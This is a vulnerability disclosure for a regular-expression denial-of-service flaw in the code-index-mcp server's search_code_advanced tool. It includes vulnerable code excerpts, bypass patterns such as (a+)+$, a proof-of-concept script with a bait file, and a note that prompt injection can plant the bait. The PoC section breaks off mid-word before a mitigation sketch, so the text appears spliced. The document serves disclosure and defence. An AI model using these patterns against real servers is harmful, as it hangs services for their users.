Submit #830786: johnhuang316 code-index-mcp Latest Denial of Service

Title: johnhuang316 code-index-mcp Latest Denial of Service
Description

Summary

CODE-INDEX-MCP contains a ReDoS (regular expression denial of service) vulnerability. The issue stems from improper handling of user-supplied patterns by the BasicSearchStrategy within the server's SearchStrategy. The search_code_advanced tool on this MCP server recursively reads all files of a specified type (e.g., *.py) in the directory and matches their contents against the supplied pattern. If an attacker uses a method such as prompt injection to write a .py file containing aaaaaaaaaaaaaaaaaaaaaaaab to any directory (e.g., /tmp/project) and then calls search_code_advanced with a malicious pattern (e.g., (a+)+$), a ReDoS attack is triggered.

Detail

CODE-INDEX-MCP is a Python-based MCP server that provides codebase indexing and code search capabilities. It exposes multiple MCP tools, including search_code_advanced, which accepts parameters such as pattern (the search regex or string), base_path (the directory to search), and regex (a boolean flag that enables regex mode). When invoked, the tool recursively walks the specified directory, reads the contents of all files matching supported extensions, and performs pattern matching against each line.

The server implements a fallback search strategy called BasicSearchStrategy, which is used when no external search tool (such as ripgrep, ag, grep, or ugrep) is available on the system. This strategy uses Python's native re module for regex matching. The code includes a function, is_safe_regex_pattern(), intended to detect potentially dangerous patterns, but the check is insufficient and common ReDoS patterns bypass it.

When regex is set to True, the pattern is compiled directly into a Python regex and applied line by line to all file contents. If an attacker supplies a malicious regex pattern with nested quantifiers (e.g., (a+)+$, (.*)*, or ([a-z]+)+) and the target files contain content that triggers catastrophic backtracking (such as repeated characters followed by a non-matching terminator), the regex engine enters exponential-time matching.
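To make the exponential growth concrete, the following minimal sketch times Python's re module on the pattern (a+)+$ against inputs of the form 'a' * n + 'b'. The helper name time_failed_match and the chosen values of n are illustrative assumptions and do not come from the report. Absolute timings depend on the machine, but each additional 'a' should roughly double the run time.

```python
import re
import time

# Nested quantifier pattern cited in the report.
PATTERN = re.compile(r"(a+)+$")


def time_failed_match(n):
    """Search a line of n 'a' characters followed by 'b'.

    The trailing 'b' prevents '$' from matching, so the engine
    backtracks through every way of splitting the run of 'a's.
    Returns the match result (expected: None) and elapsed seconds.
    """
    text = "a" * n + "b"
    start = time.perf_counter()
    result = PATTERN.search(text)
    return result, time.perf_counter() - start


# Small values of n keep the demonstration short; do not raise n much
# further, because the run time grows exponentially.
for n in (14, 16, 18, 20):
    result, elapsed = time_failed_match(n)
    print(f"n={n:2d} matched={result is not None} elapsed={elapsed:.4f}s")
```

The values of n are deliberately small. The report's bait line uses 35 'a' characters, which is far beyond what completes in a reasonable time.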
This causes CPU exhaustion and effectively hangs the server, resulting in a Denial of Service.

The attack is particularly effective when combined with file write capabilities: an attacker can first create a file containing ReDoS-triggering content (e.g., aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab), then invoke search_code_advanced with a malicious pattern. Alternatively, if target directories contain files with naturally occurring repeated character sequences (such as Markdown table separators |----------| or comment dividers # ========), the attacker can craft a targeted regex (e.g., (-+)+$) to exploit these existing contents.

Vulnerable Code

The search_code_advanced MCP tool is defined in the server with a regex parameter that enables regex pattern matching:

Version: Latest
File: src/code_index_mcp/server.py (Lines 280-307)

    @mcp.tool()
    @handle_mcp_tool_errors(return_type="dict")
    @with_concurrency_limit
    def search_code_advanced(
        pattern: str,
        ctx: Context,
        case_sensitive: bool = True,
        context_lines: int = 0,
        file_pattern: str = None,
        fuzzy: bool = False,
        regex: bool = None,
        start_index: int = 0,
        max_results: int | None = 10,
    ) -> dict[str, Any]:
        """
        Search for code pattern with pagination. Auto-selects best search tool (ugrep/ripgrep/ag/grep).
        Supports glob file_pattern (e.g., "*.py"), regex patterns, and fuzzy matching (ugrep only).
        """
        return SearchService(ctx).search_code(
            pattern=pattern,
            case_sensitive=case_sensitive,
            context_lines=context_lines,
            file_pattern=file_pattern,
            fuzzy=fuzzy,
            regex=regex,
            start_index=start_index,
            max_results=max_results,
        )

When no external search tools are available, the server falls back to BasicSearchStrategy, which uses Python's re module. The is_safe_regex_pattern() function attempts to detect dangerous patterns but has insufficient coverage:

Version: Latest
File: src/code_index_mcp/search/base.py (Lines 124-156)

    def is_safe_regex_pattern(pattern: str) -> bool:
        """
        Check if a pattern appears to be a safe regex pattern.

        Args:
            pattern: The search pattern to check

        Returns:
            True if the pattern looks like a safe regex, False otherwise
        """
        # Strong indicators of regex intent
        strong_regex_indicators = ['|', '(', ')', '[', ']', '^', '$']

        # Weaker indicators that need context
        weak_regex_indicators = ['.', '*', '+', '?']

        # Check for strong regex indicators
        has_strong_regex = any(char in pattern for char in strong_regex_indicators)

        # Check for weak indicators with context
        has_weak_regex = any(char in pattern for char in weak_regex_indicators)

        # If has strong indicators, likely regex
        if has_strong_regex:
            # Still check for dangerous patterns
            dangerous_patterns = [
                r'(.+)+',     # Nested quantifiers
                r'(.*)*',     # Nested stars
                r'(.{0,})+',  # Potential ReDoS patterns
            ]
            has_dangerous_patterns = any(dangerous in pattern for dangerous in dangerous_patterns)
            return not has_dangerous_patterns

The check only looks for three specific literal substrings. Patterns like (a+)+$, ([a-z]+)+, or (x+x+)+y bypass this validation entirely.
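The bypass can be illustrated with a short sketch that reproduces only the literal substring test from the excerpt above. The function name passes_substring_check is hypothetical and the sketch is not the project's code. It assumes the three substrings quoted in the report are the complete blocklist.

```python
# The three literal substrings quoted in the report's excerpt.
DANGEROUS_SUBSTRINGS = [r'(.+)+', r'(.*)*', r'(.{0,})+']


def passes_substring_check(pattern: str) -> bool:
    """Hypothetical stand-in for the blocklist step only.

    Returns True when none of the literal substrings occurs in the
    pattern, i.e. when the pattern would be treated as safe.
    """
    return not any(bad in pattern for bad in DANGEROUS_SUBSTRINGS)


candidates = [
    r'(.+)+',      # listed literally, so it is rejected
    r'(a+)+$',     # nested quantifier over a literal character
    r'([a-z]+)+',  # nested quantifier over a character class
    r'(x+x+)+y',   # overlapping repetitions inside a repeated group
    r'(-+)+$',     # targets existing Markdown or comment dividers
]

for candidate in candidates:
    verdict = "accepted" if passes_substring_check(candidate) else "rejected"
    print(f"{candidate!r:14} {verdict}")
```

Only the first candidate is rejected. The others have the same nested quantifier structure but differ textually from the blocklisted strings, which is why matching on literal substrings cannot cover this class of patterns.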
In BasicSearchStrategy.search(), the user-supplied pattern is compiled and executed against every line of every file:

Version: Latest
File: src/code_index_mcp/search/basic.py (Lines 69-74)

    try:
        if regex:
            # Use regex mode - check for safety first
            if not is_safe_regex_pattern(pattern):
                raise ValueError(f"Potentially unsafe regex pattern: {pattern}")
            search_regex = re.compile(pattern, flags)

The compiled regex is then applied to each line without any timeout protection:

Version: Latest
File: src/code_index_mcp/search/basic.py (Lines 103-110)

    try:
        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
            for line_num, line in enumerate(f, 1):
                if search_regex.search(line):
                    content = line.rstrip('\n')
                    if rel_path not in results:
                        results[rel_path] = []
                    results[rel_path].append((line_num, content))

When the search encounters content that triggers catastrophic backtracking (e.g., a line containing aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab), the search_regex.search(line) call with a malicious pattern like (a+)+$ enters exponential-time matching, causing CPU exhaustion and hanging the server indefinitely.

PoC

Using Python Script

This PoC demonstrates the ReDoS vulnerability by directly invoking the BasicSearchStrategy class, bypassing the MCP protocol layer to isolate and verify the vulnerable code path.

Step 1. Create a Python script PoC.py with the following content:

    import os, tempfile, time, signal
    from code_index_mcp.search.basic import BasicSearchStrategy

    # 1. Create bait file with ReDoS-triggering content
    tmpdir = tempfile.mkdtemp(prefix="redos_verify_")
    bait_file = os.path.join(tmpdir, "bait.txt")
    with open(bait_file, "w") as f:
        f.write("a" * 35 + "b\n")  # 35 'a's followed by 'b' triggers exponential backtracking

    strategy = BasicSearchStrategy()

    # 2. Baseline test with safe pattern
    print("--- Baseline: safe regex ---")
    t0 = time.time()
    results = strategy.search(pattern="normal", base_path=tmpdir, regex=False)
    elapsed_safe = time.time() - t0
    print(f"Elapsed: {elapsed_safe:.4f}s")

    # 3. ReDoS test with malicious pattern (with 10s timeout protection)
    print("\n--- ReDoS: malicious regex '(a+)+$' ---")

    def timeout_handler(signum, frame):
        raise TimeoutError("ReDoS confirmed! Regex matching exceeded 10 seconds")

    signal.signal(signal.SIGALRM, timeout_handler)
    signal.alarm(10)
    try:
        t0 = time.time()
        results = strategy.search(pattern="(a+)+$", base_path=tmpdir, regex=True)
        elapsed_redos = time.time() - t0
        signal.alarm(0)
        print(f"Elapsed: {elapsed_redos:.4f}s")
        if elapsed_redos > 1.0:
            print(f" VULNERABLE: took {elapsed_redos:.1f}s (normal should be <0.01s)")
    except TimeoutError as e:
        signal.alarm(0)
        print(f"VULNERABLE CONFIRMED: {e}")

    # 4. Cleanup
    os.unlink(bait_file)
    os.rmdir(tmpdir)

Step 2. Run the script:

    python PoC.py

The PoC's 10-second timeout guard fires, which shows that matching the malicious pattern took longer than 10 seconds.

By disabling the timeout protection mechanism in PoC.py

    import os, tempfile, time, signal
    from code_index_mcp.search.basic import BasicSearchStrategy

    # 1. Create bait file with ReDoS-triggering content
    tmpdir = tempfile.mkdtemp(prefix="redos_verify_")
    bait_file = os.path.join(tmpdir, "bait.txt")
    with open(bait_file, "w") as f:
        f.write("a" * 35 + "b\n")  # 35 'a's followed by 'b' triggers exponential backtracking

    strategy = BasicSearchStrategy()

    # 2. Baseline test with safe pattern
    print("--- Baseline: safe regex ---")
    t0 = time.time()
    results = strategy.search(pattern="normal", base_path=tmpdir, regex=False)
    elapsed_safe = time.time() - t0
    print(f" Elapsed: {elapsed_safe:.4f}s")

    # 3. ReDoS test with malicious pattern
    print("\n--- ReDoS: malicious regex '(a+)+$' ---")
    # def timeout_handler(signum, frame):
    #     raise TimeoutError("ReDoS confirmed! Regex matching exceeded 10 seconds")
    # signal.signal(signal.SIGALRM, timeout_handler)
    # signal.alarm(10)
    t0 = time.time()
    results = strategy.search(pattern="(a+)+$", base_path=tmpdir, regex=True)
    elapsed_redos = time.time() - t0
    # signal.alarm(0)
    print(f" Elapsed: {elapsed_redos:.4f}s")
    if elapsed_redos > 1.0:
        print(f" VULNERABLE: took {elapsed_redos:.1f}s (normal should be <0.01s)")

    # 4. Cleanup
    os.unlink(bait_file)
    os.rmdir(tmpdir)

running po
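The report notes that the per-line search runs without any timeout protection. One possible way to bound the matching time, sketched here under stated assumptions, is to run the match in a child Python process and kill it when a deadline passes. The function name search_with_timeout, the exit codes, and the default timeout are illustrative choices; this is not the project's fix and not taken from the report.

```python
import subprocess
import sys

# Child program: exit code 10 means "match", 11 means "no match".
# Any other exit code signals an error such as an invalid pattern.
_CHILD_CODE = (
    "import re, sys\n"
    "pattern, text = sys.argv[1], sys.argv[2]\n"
    "sys.exit(10 if re.search(pattern, text) else 11)\n"
)


def search_with_timeout(pattern, text, timeout_s=5.0):
    """Return True or False for match or no match, None on timeout.

    Matching runs in a separate interpreter because an in-process
    re.search call cannot be interrupted from another thread.
    subprocess.run kills the child when the timeout expires.
    """
    try:
        proc = subprocess.run(
            [sys.executable, "-c", _CHILD_CODE, pattern, text],
            timeout=timeout_s,
            stderr=subprocess.DEVNULL,
        )
    except subprocess.TimeoutExpired:
        return None
    if proc.returncode == 10:
        return True
    if proc.returncode == 11:
        return False
    raise ValueError(f"regex search failed for pattern: {pattern!r}")


print(search_with_timeout("a+b", "aaab"))
print(search_with_timeout("(a+)+$", "a" * 40 + "b", timeout_s=1.0))
```

Starting a process per line is expensive, so a real implementation would more plausibly batch a whole file or search per worker. The sketch only shows that a hard deadline turns an indefinite hang into a bounded failure.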
Source: https://github.com/johnhuang316/code-index-mcp/issues/84
User: skywings (UID 98274)
Submission: 15.05.2026 10:36 (20 days ago)
Moderation: 02.06.2026 17:43 (18 days later)
Status: Accepted
VulDB Entry: 367961 [johnhuang316 code-index-mcp up to 2.14.0 search_code_advanced is_safe_regex_pattern regex Denial of Service]
Points: 20
